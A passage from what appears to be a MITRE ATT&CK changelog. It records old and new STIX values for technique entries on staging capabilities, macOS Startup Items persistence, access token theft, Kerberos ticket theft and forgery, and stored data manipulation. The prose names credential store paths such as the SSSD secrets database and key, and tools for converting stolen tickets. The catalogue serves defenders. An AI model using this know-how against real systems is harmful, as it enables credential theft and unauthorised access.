site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) |
| external_references[2]['source_name'] | FireEye CFR Watering Hole 2012 | Netskope GCP Redirection |
| external_references[2]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection |
| external_references[3]['source_name'] | Gallagher 2015 | Netskope Cloud Phishing |
| external_references[3]['description'] | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. | Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022. |
| external_references[3]['url'] | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ | https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service |
| external_references[5]['source_name'] | Malwarebytes Silent Librarian October 2020 | DigiCert Install SSL Cert |
| external_references[5]['description'] | Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021. | DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021. |
| external_references[5]['url'] | https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ | https://www.digicert.com/kb/ssl-certificate-installation.htm |
| external_references[6]['source_name'] | Proofpoint TA407 September 2019 | Gallagher 2015 |
| external_references[6]['description'] | Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021. | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. |
| external_references[6]['url'] | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ |
| external_references[7]['source_name'] | DigiCert Install SSL Cert | Malwarebytes Heroku Skimmers |
| external_references[7]['description'] | DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021. | Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022. |
| external_references[7]['url'] | https://www.digicert.com/kb/ssl-certificate-installation.htm | https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku |
| x_mitre_version | 1.1 | 1.2 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Dragos Heroku Watering Hole', 'description': 'Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.', 'url': 'https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/'} | |
| external_references | {'source_name': 'FireEye CFR Watering Hole 2012', 'description': 'Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html'} | |
| external_references | {'source_name': 'Malwarebytes Silent Librarian October 2020', 'description': 'Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.', 'url': 'https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/'} | |
| external_references | {'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'} |

| Old Description | New Description |
|---|---|
| Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items) This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. | Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)<br>This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.<br>An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 23:47:39.124000+00:00 | 2022-04-20 16:43:21.560000+00:00 |
| description | Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)<br>This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.<br>An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. | Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)<br>This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.<br>An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |

| Old Description | New Description |
|---|---|
| Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application.<br>Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols.<br>An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 17:56:17.311000+00:00 | 2022-04-21 16:25:11.482000+00:00 |
| description | Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application.<br>Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols.<br>An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. |
| external_references[1]['source_name'] | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 | Amnesty OAuth Phishing Attacks, August 2019 |
| external_references[1]['description'] | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. | Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019. |
| external_references[1]['url'] | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ | https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/ |
| external_references[2]['source_name'] | Microsoft Identity Platform Protocols May 2019 | Auth0 Understanding Refresh Tokens |
| external_references[2]['description'] | Microsoft. (n.d.). Retrieved September 12, 2019. | Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols | https://auth0.com/learn/refresh-tokens/ |
| external_references[3]['source_name'] | Microsoft - OAuth Code Authorization flow - June 2019 | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 |
| external_references[3]['description'] | Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019. | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ |
| external_references[4]['source_name'] | Microsoft - Azure AD App Registration - May 2019 | Trend Micro Pawn Storm OAuth 2017 |
| external_references[4]['description'] | Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019. | Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks |
| external_references[5]['source_name'] | Microsoft - Azure AD Identity Tokens - Aug 2019 | Kubernetes Service Accounts |
| external_references[5]['description'] | Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019. | Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens | https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/ |
| external_references[6]['source_name'] | Amnesty OAuth Phishing Attacks, August 2019 | Microsoft - Azure AD Identity Tokens - Aug 2019 |
| external_references[6]['description'] | Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019. | Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019. |
| external_references[6]['url'] | https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/ | https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens |
| external_references[7]['source_name'] | Trend Micro Pawn Storm OAuth 2017 | Microsoft - Azure AD App Registration - May 2019 |
| external_references[7]['description'] | Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. | Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019. |
| external_references[7]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks | https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft - OAuth Code Authorization flow - June 2019', 'description': 'Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.', 'url': 'https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow'} | |
| external_references | {'source_name': 'Microsoft Identity Platform Protocols May 2019', 'description': 'Microsoft. (n.d.). Retrieved September 12, 2019.', 'url': 'https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols'} | |
| x_mitre_contributors | Suzy Schapperle - Microsoft Azure Red Team | |
| x_mitre_contributors | Ram Pliskin, Microsoft Azure Security Center | |
| x_mitre_contributors | Jen Burns, HubSpot | |
| x_mitre_platforms | Containers |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) | Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.<br>On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)<br>Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)<br>Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 22:56:22.054000+00:00 | 2022-03-08 21:45:01.934000+00:00 |
| description | Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.<br>On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)<br>Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)<br>Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) | Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.<br>On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)<br>Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)<br>Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) |
| x_mitre_data_sources[0] | File: File Access | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Logon Session: Logon Session Metadata |
| x_mitre_data_sources[3] | Logon Session: Logon Session Metadata | File: File Access |
| x_mitre_version | 1.3 | 1.4 |
| Old Description | New Description |
|---|---|
| Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
